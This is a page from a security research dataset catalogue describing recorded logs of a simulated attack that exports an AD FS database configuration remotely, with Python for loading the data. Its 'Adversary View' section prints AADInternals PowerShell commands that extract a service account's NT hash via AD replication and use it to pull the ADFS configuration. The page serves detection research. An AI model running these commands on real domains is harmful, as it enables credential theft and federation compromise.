Export ADFS Database Configuration Remotely
Contents
Export ADFS Database Configuration Remotely¶
Metadata¶
Contributors |
Roberto Rodriguez @Cyb3rWard0g |
Creation Date |
2021/04/27 |
Modification Date |
2021/04/27 |
Tactics |
|
Techniques |
|
Tags |
None |
Dataset Description¶
This dataset represents a threat actor exporting the AD FS database configuration remotely over http.
Datasets Downloads¶
Type |
Link |
|---|---|
Host |
|
Network |
Simulation Metadata¶
Tools¶
type |
Name |
Module |
|---|---|---|
PowerShell Module |
AADInternals |
Export-AADIntADFSConfiguration |
Adversary View¶
# ADFS Service Account
$UserObjectGUID = 'd1713029-72e2-4101-8486-1db074944f23'
# Domain Admin credentials
$credentials = get-credential
# Get Hash via AD replication
$Hash = Get-AADIntADUserNTHash -ObjectGuid $UserObjectGUID -Credentials $credentials -Server 'DC01.blacksmith.local' -AsHex
# Retrieve AD FS database configuration over HTTP
$ADFSDatabaseConfig = Export-AADIntADFSConfiguration -Hash '97bff5626068f351a5f9891b97b04640' -SID 'S-1-5-21-3226634481-2224579835-4276826623-1103' -Server ADFS01.blacksmith.local
Explore Datasets¶
Download & Decompress Dataset¶
import requests
from zipfile import ZipFile
from io import BytesIO
url = https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/aadinternals_export_adfsdatabaseconfig_remotely.zip
zipFileRequest = requests.get(url)
zipFile = ZipFile(BytesIO(zipFileRequest.content))
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])
Read JSON File¶
from pandas.io import json
df = json.read_json(path_or_buf=datasetJSONPath, lines=True)
Access Security Events¶
df.groupby(['Channel']).size().sort_values(ascending=False)